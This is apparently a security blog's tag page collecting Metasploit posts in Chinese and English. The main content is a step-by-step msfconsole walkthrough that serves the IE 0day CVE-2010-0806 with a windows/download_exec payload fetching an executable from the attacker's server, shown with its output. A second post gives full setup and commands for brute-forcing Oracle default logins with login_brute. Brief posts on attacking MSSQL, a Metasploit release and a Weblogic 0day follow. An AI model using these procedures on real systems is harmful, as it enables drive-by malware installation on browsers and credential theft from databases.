我的时光,停在了你的角落…~
Posts tagged Metasploit
关于最近那个网马0day(CVE-2010-0806)用Metasploit生成方法
Mar 11th
一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb
二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb
三、启动msfconsole
四、msf > use exploit/test/ie
msf exploit(ie) > show optinos
回显:
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
– —-
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080
msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.
msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.
然后打开http://192.168.0.3:8080/4rJ0JRSnX55wAY,你就可以看到源码了。
红字是命令,其它的是回显
from:http://hi.baidu.com/myvbscript/blog/item/c1444edf23fa3e1848540320.html
Attacking MSSQL with Metasploit
Dec 1st
Now a days hacking has shifted from attacking systems to know how they work or for the trill of getting into a system for the sake of the hunt but many hackers are doing it for profit, in fact many companies around the world and states are employing hacker for information both for political and financial gain. One of the places where most of this information resides is in databases and one of the most popular databases in enterprises and governments now a days is Microsoft SQL Server and on this blog post I will cover some of the attacks you can do against this system with Metasploit 3.3.
More detail : http://pauldotcom.com/2009/11/attacking-mssql-with-metasploi.html
Metasploit Framework 3.3 Release Candidate 1
Nov 10th
This 3.3 release candidate is an early snapshot of what Metasploit 3.3 will look like. We are looking for feedback from the community about the new installers, the stability of the framework itself, and the functional changes between 3.3 and earlier releases of the Metasploit Framework. The 3.3 Draft Release Notes go into detail on the new features and behaviors of this version. For a full list of bug fixes, please refer to the Redmine ChangeLog . If you are a software packager and would like to include Metasploit 3.3 in your distribution or operating system, please contact us via email at msfdev[at]metasploit.com. The final release of 3.3 should occur before the end of November. Metasploit is a Rapid7 Open Source Project.
Download and more info: https://metasploit.com/redmine/projects/framework/wiki/Release_33RC1
Linux下安装Metasploit破解Oracle登录用户名密码
Oct 20th
by:vitter@safechina.net
blog.securitycn.net
最近在搞oracle,一些小东西记录一下。
Metasploit是一个很好的攻击工具包,当然我们这次不是介绍这个工具包的,主要是大牛MC写 了很多oracle的工具,在最近会经常用。我主要会用到经典工具tnscmd移植到MSF中的小工具(不如pl的好用,没换行,看结果很 累),sid_brute和login_brute,用的最多的还是暴力破解oracle用户名和密码的login_brute。下面就说下怎么安装和使 用,主要是安装,因为有些需要注意的东西,请注意斜体字。
1、先装gcc编译环境 (我用的server比较惨,最小安装,系统也老,FC2。)
rpm -ivh cpp-3.3.3-7.i386.rpm
rpm -ivh glibc-kernheaders-2.4-8.44.i386.rpm
rpm -ivh glibc-headers-2.3.3-27.i386.rpm
rpm -ivh glibc-devel-2.3.3-27.i386.rpm
rpm -ivh binutils-2.15.90.0.3-5.i386.rpm
rpm -ivh gcc-3.3.3-7.i386.rpm
2、安装oracle客户端
下载:http://www.oracle.com/technology/software/tech/oci/instantclient/htdocs/linuxsoft.html
rpm包安装比较省事,当然你也可以下载压缩包安装,按照说明来装即可。
rpm -ivh oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm oracle- instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm
装完后,执行下面2条命令,同时设置在环境变量里,加入到/etc/profile最后即可:
LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib/
export LD_LIBRARY_PATH
3、装ruby
下载:http://www.ruby-lang.org/en/downloads/
tar zxvf ruby-1.8.5-p231.tar.bz2 #(这个注意下,不要装1.9的版本,否则会出现MSF不能读CSV文件的问题,报NameError uninitialized constant CSV::Reader错误)
cd ruby-1.8.5-p231
./configure
make && make install
4、装ruby-oci8
安装说明:http://ruby-oci8.rubyforge.org/en/InstallForInstantClient.html
下载:http://rubyforge.org/projects/ruby-oci8/
这个ruby-oci8-1.0.6版本或者 ruby-oci8-2.0.0都可以。
安装前要确认环境变量,即sqlplus能正常运行就可:
LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export LD_LIBRARY_PATH
tar zxvf ruby-oci8-2.0.0.tar.gz
cd ruby-oci8-2.0.0
make
make install
5、装ruby-dbi
下载:http://rubyforge.org/frs/?group_id=234
用dbi-0.2.2,一定不要新过这个版本,否则MSF会报“The dbi module is not available!”错误。
cd dbi-0.2.2
ruby setup.rb config –with=dbi,dbd_oracle #(–with=dbi,dbd_oracle这个参数一定要,否则还是报dbi错误)
ruby setup.rb setup
ruby setup.rb install
6、下载安装使用MSF
svn co http://metasploit.com/svn/framework3/trunk/ ./
./msfconsole
如果msf报错缺少openssl、zlib、gem,则需要先装下。
rpm -ivh openssl-devel-0.9.7a-35.i386.rpm
cd ruby-1.8.5-p231/ext/openssl
ruby extconf.rb
make
make install
装zlib
cd ruby-1.8.5-p231/ext/zlib
ruby extconf.rb
make
make install
装gem
tar zxvf rubygems-1.3.1.tgz
cd rubygems-1.3.1
ruby setup.rb all
一切ok就可以运行了(如果还缺别的按要求装上,用gem安装ruby模块很方便):
msf > use auxiliary/admin/oracle/login_brute
msf auxiliary(login_brute) > set RHOST 192.168.0.11
RHOST => 192.168.0.11
msf auxiliary(login_brute) > set SID oracle
SID => oracle
msf auxiliary(login_brute) > info
Name: Oracle brute forcer for known default accounts.
Version: 6876
License: Metasploit Framework License (BSD)
Provided by:
MC
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
CSVFILE /root/msf3/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts.
RHOST 192.168.0.11 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID oracle yes The sid to authenticate with.
Description:
This module uses a list of well known authentication credentials for
bruteforcing the TNS service. A log file of discoverd credentials
can be found in ./data/wordlists/oracle_default_found.log.
References:
https://www.metasploit.com/users/mc
http://www.petefinnigan.com/default/oracle_default_passwords.csv
msf auxiliary(login_brute) > run
破解结果会存在MSF目录下data/wordlists/oracle_default_found.log文件里面。
本博原创,如转载请注明出处:
http://blog.vfocus.net
,谢谢。
Weblogic 0day – JSESSIONID cookie value overflow
Mar 29th
From: Sowhat
Metasploit更新了,0day,顶。
这个漏洞一般的web fuzzer应该都能找到吧
最新评论